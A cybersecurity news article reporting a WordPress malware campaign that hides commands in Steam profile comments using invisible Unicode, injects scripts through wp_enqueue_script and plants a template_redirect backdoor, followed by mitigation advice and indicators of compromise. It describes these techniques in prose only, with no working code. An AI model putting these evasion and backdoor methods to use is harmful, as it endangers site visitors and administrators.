A recent malware campaign has alarmed the web security community by targeting WordPress websites in an unprecedented manner. The attackers behind this operation have devised a unique method of communication with compromised sites, cleverly concealing command instructions within Steam Community profile comments, thus transforming a renowned gaming platform into a covert control channel.
Innovative Malware Communication Method
This malware operates in two distinct stages. Initially, it injects harmful JavaScript into the frontend of a compromised WordPress site, which can serve dangerous content to any visitor landing on the page. Following this, a server-side backdoor is installed, granting attackers enduring remote access, enabling them to alter WordPress plugin and theme files without detection.
GoDaddy’s security team uncovered this campaign, first detected in July 2024, now affecting around 1,900 WordPress sites. The perpetrators are effectively disguising their operations by leveraging Valve’s reputable gaming platform, rather than using overtly malicious servers that could be easily identified and shut down.
Stealthy Techniques and Impact
What makes this malware particularly elusive is its use of steganography, hiding malicious payloads with invisible Unicode characters within Steam profile comments. This technique allows it to evade traditional text-based scanning tools during routine security checks, making detection extremely challenging.
Compromised websites unknowingly distribute injected scripts to visitors, putting real users at risk. For site administrators, the threat is even more profound, as the backdoor facilitates unauthorized code modifications, even after partial removal efforts.
Technical Details of the Attack
The core of the malware leverages a PHP function embedded within the compromised WordPress installation. Upon page load, the malware dispatches an HTTP request to a Steam Community profile, extracting and decoding hidden payloads from comment text.
The malicious data is then injected into every front-end page as a JavaScript URL through the wp_enqueue_script hook, using a deceptive handle name designed to mimic a legitimate library. This URL, observed to point to hello-myworld[.]info, delivers the final malicious payload to site visitors.
Precautionary Measures and Analysis
The server-side component is equally dangerous, with a backdoor function allowing remote code execution via WordPress’s template_redirect hook. This function listens for specific POST requests and can rewrite plugin and theme files if the correct authentication cookies are presented.
The malware employs multiple obfuscation techniques to avoid detection, including encoding string constants and using randomized hexadecimal naming conventions. To mitigate the threat, site administrators should immediately activate maintenance mode, back up their site, and rotate all credentials. A thorough cleanup of all plugin and theme files is essential, as partial removal is insufficient due to the backdoor’s capabilities.
Indicators of compromise include suspicious transient cache entries and unknown external scripts. Any suspicious activity should be thoroughly investigated and addressed swiftly to prevent further damage.
Stay updated on the latest security threats by following our channels on Google News, LinkedIn, and X, and consider setting CSN as your preferred source for cybersecurity updates.
